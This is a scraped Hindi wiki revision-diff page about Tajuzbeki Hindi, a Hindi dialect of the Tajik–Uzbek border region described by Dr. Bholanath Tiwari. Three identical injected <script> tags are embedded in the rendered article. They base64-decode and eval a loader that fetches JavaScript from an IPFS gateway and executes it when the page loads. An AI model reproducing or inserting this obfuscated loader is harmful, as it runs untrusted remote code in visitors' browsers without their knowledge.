Difference between revisions of "ताजुज़्बेकी हिन्दी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(5 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*सोवियत संघ में तज़ाकिस्तान तथा उज्बेकिस्तान की सीमा पर हिसार, शहरेनव, रेगार, सूची आदि में बोली जाने वाली इस [[हिन्दी]] बोली का यह नाम डॉ. भोलानाथा तिवारी ने  दिया है। विस्तार के लिए देखिए 'ताजुज़्बेकी', डॉ. भोलानाथा तिवारी<ref> विस्तार के लिए देखिए 'ताजुज़्बेकी', डॉ. भोलानाथा तिवारी</ref>  
+
'''ताजुज़्बेकी हिन्दी''' सोवियत संघ में तज़ाकिस्तान तथा [[उज़बेकिस्तान]] की सीमा पर हिसार, शहरेनव, रेगार, सूची आदि में बोली जाती है। इस [[हिन्दी]] बोली को यह नाम डॉ. भोलानाथा तिवारी ने  दिया है। विस्तार के लिए देखिए 'ताजुज़्बेकी', डॉ. भोलानाथा तिवारी<ref> विस्तार के लिए देखिए 'ताजुज़्बेकी', डॉ. भोलानाथा तिवारी</ref>
*डॉ. भोलानाथा तिवारी के अनुसार इसके बोलने वाले [[दिल्ली]] के आसपास कुछ दक्षिण- पश्चिम से 13वीं सदी के लगभग चलकर [[पंजाबी]] [[अफ़गानिस्तान]] होते हुए, उस क्षेत्र में पहुँचे जहाँ आज हैं।  
+
 
*प्रवास- यात्रा में इनकी भाषा पंजाबी और अफगानी से भी प्रभावित हुई, किंतु वह अब भी स्पष्ट रूप से [[हिन्दी]] बोली है। यों शब्द- भण्डार के क्षेत्र में ताजिक, उजबेक तथा रूसी ने इसे प्रभावित किया है।  
+
*डॉ. भोलानाथा तिवारी के अनुसार इसके बोलने वाले [[दिल्ली]] के आसपास कुछ दक्षिण- पश्चिम से 13वीं [[सदी]] के लगभग चलकर [[पंजाबी]] [[अफ़गानिस्तान]] होते हुए, उस क्षेत्र में पहुँचे जहाँ आज हैं।  
 +
*प्रवास- यात्रा में इनकी भाषा पंजाबी और अफ़ग़ानी से भी प्रभावित हुई, किंतु वह अब भी स्पष्ट रूप से [[हिन्दी]] बोली है। यों शब्द- भण्डार के क्षेत्र में [[ताजिक]], [[उज़बेक]] तथा रूसी ने इसे प्रभावित किया है।  
 
*मूलत: यह बोली [[ब्रजभाषा|ब्रज]], [[हरियाणी बोली|हरियानी]] तथा [[राजस्थानी भाषा|राजस्थानी]] के बीच की मालूम होती है।
 
*मूलत: यह बोली [[ब्रजभाषा|ब्रज]], [[हरियाणी बोली|हरियानी]] तथा [[राजस्थानी भाषा|राजस्थानी]] के बीच की मालूम होती है।
  
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
 
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी==
 
==टीका टिप्पणी==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भाषा और लिपि}}
 
{{भाषा और लिपि}}
[[Category:भाषा_और_लिपि]]
+
[[Category:भाषा और लिपि]][[Category:भाषा कोश]]
 
[[Category:साहित्य_कोश]]
 
[[Category:साहित्य_कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:26, 22 May 2013

tajuzbeki hindi soviyat sangh mean tazakistan tatha uzabekistan ki sima par hisar, shaharenav, regar, soochi adi mean boli jati hai. is hindi boli ko yah nam d aau. bholanatha tivari ne diya hai. vistar ke lie dekhie 'tajuzbeki', d aau. bholanatha tivari[1]

  • d aau. bholanatha tivari ke anusar isake bolane vale dilli ke asapas kuchh dakshin- pashchim se 13vian sadi ke lagabhag chalakar panjabi afaganistan hote hue, us kshetr mean pahuanche jahaan aj haian.
  • pravas- yatra mean inaki bhasha panjabi aur afagani se bhi prabhavit huee, kiantu vah ab bhi spasht roop se hindi boli hai. yoan shabd- bhandar ke kshetr mean tajik, uzabek tatha roosi ne ise prabhavit kiya hai.
  • moolat: yah boli braj, hariyani tatha rajasthani ke bich ki maloom hoti hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani

  1. vistar ke lie dekhie 'tajuzbeki', d aau. bholanatha tivari

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>